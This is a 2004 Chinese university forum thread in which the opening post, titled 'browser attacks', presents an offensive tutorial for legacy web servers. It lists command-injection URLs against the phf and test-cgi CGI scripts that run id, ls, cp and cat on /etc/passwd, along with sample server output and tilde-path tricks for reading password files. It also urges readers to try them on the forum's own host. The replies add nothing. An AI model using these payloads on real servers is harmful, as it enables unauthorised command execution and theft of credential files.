设为首页
开启辅助访问 记住本站网址:www.gxjmbbs.com切换到宽版

广西经贸职业技术学院论坛

 忘记密码
 免费注册
广西经贸职业技术学院论坛»首页 ╒╤≡校园校友共建区≡╤╕ 『灌水天堂』 浏览器攻击
返回列表 发新帖
查看: 691|回复: 5
打印 上一主题 下一主题

浏览器攻击

[复制链接]
saviour

该用户从未签到
跳转到指定楼层
楼主
发表于 2004-3-9 11:00:00 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
在本章我将讲述一些利用浏览器来进行攻击的方法<br/> 1。大家都知道了phf攻击了,phf是cgi script,很多站点都有这个大漏洞啦,使用<br/> http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd指令可以拿到那个站点的passwd.但还有些更好的执行方法呦如:<br/> http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna</p><p> me=&Qoffice_phone=<br/> http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=<br/> haqr&Qemail=&Qnickname=&Qoffice_phone=<br/> http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd<br/> %0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=<br/> http://thegnome.com/~someuser/passwd<br/> http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname</p><p> =haqr&Qemail=&Qnickname=&Qoffice_phone=<br/> 上面执行的命令是<br/> id<br/> ls -la ~someuser<br/> cp /etc/passwd ~someuser/passwd<br/> rm ~someuser/passwd</p><p> 2。有关test攻击<br/> http://thegnome.com/cgi-bin/test-cgi?\whatever<br/> 服务器会应答,本服务器的一些情况如:<br/> CGI/1.0 test script report:</p><p> argc is 0. argv is .</p><p> SERVER_SOFTWARE = NCSA/1.4B<br/> SERVER_NAME = thegnome.com<br/> GATEWAY_INTERFACE = CGI/1.1<br/> SERVER_PROTOCOL = HTTP/1.0<br/> SERVER_PORT = 80<br/> REQUEST_METHOD = GET<br/> HTTP_ACCEPT = text/plain, application/x-html, application/html, <br/> text/html, text/x-html<br/> PATH_INFO =<br/> PATH_TRANSLATED =<br/> SCRIPT_NAME = /cgi-bin/test-cgi<br/> QUERY_STRING = whatever<br/> REMOTE_HOST = fifth.column.gov<br/> REMOTE_ADDR = 200.200.200.200<br/> REMOTE_USER =<br/> AUTH_TYPE =<br/> CONTENT_TYPE =<br/> CONTENT_LENGTH =</p><p> 好吧,让我们来点赶兴趣的<br/> http://thegnome.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd</p><p> 3。~的应用<br/> ~主要是用在很多的个人主页上的快捷目录的方法,如果我们使用这样的~<br/> http://thegnome.com/~root<br/> http://thegnome.com/~root/etc/passwd<br/> 不是在任何平台上都通过呦,在BSD Apache上曾经成功过,当然还可以试试~bin ,~etc,~uucp.....<br/> 看到这个站点了吗,本站所在的这个站点就是用这种形式的,如果我们打入 本站所在的web地址/~bin<br/> 出现了什么,你看到了吗?然后...............注意请不要破坏<br/>
攻击, 浏览器

相关帖子

常上飞翔,梦想飞扬!经贸是我家,建设靠大家~ 人们都说:不在大学论坛里灌过水的大学都像是没读过大学~
回复

使用道具 举报

figohf

该用户从未签到
沙发
发表于 2004-6-21 11:16:00 | 只看该作者
挺好~~认真学学!!
常上飞翔,梦想飞扬!经贸是我家,建设靠大家~ 人们都说:不在大学论坛里灌过水的大学都像是没读过大学~
回复 支持 反对

使用道具 举报

saviour

该用户从未签到
地板
 楼主| 发表于 2004-6-22 08:09:00 | 只看该作者
[emb5]
常上飞翔,梦想飞扬!经贸是我家,建设靠大家~ 人们都说:不在大学论坛里灌过水的大学都像是没读过大学~
回复 支持 反对

使用道具 举报

々木飞々 该用户已被删除
4
发表于 2004-6-22 08:25:00 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
常上飞翔,梦想飞扬!经贸是我家,建设靠大家~ 人们都说:不在大学论坛里灌过水的大学都像是没读过大学~
回复 支持 反对

使用道具 举报

saviour

该用户从未签到
5
 楼主| 发表于 2004-6-22 08:26:00 | 只看该作者
[emb5]没人
常上飞翔,梦想飞扬!经贸是我家,建设靠大家~ 人们都说:不在大学论坛里灌过水的大学都像是没读过大学~
回复 支持 反对

使用道具 举报

々木飞々 该用户已被删除
6
发表于 2004-6-22 08:27:00 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽
常上飞翔,梦想飞扬!经贸是我家,建设靠大家~ 人们都说:不在大学论坛里灌过水的大学都像是没读过大学~
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 免费注册

本版积分规则

QQ|版主考核中心|『经贸在线』 ( 桂ICP备15001539号-2  

GMT+8, 2024-11-23 18:28

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表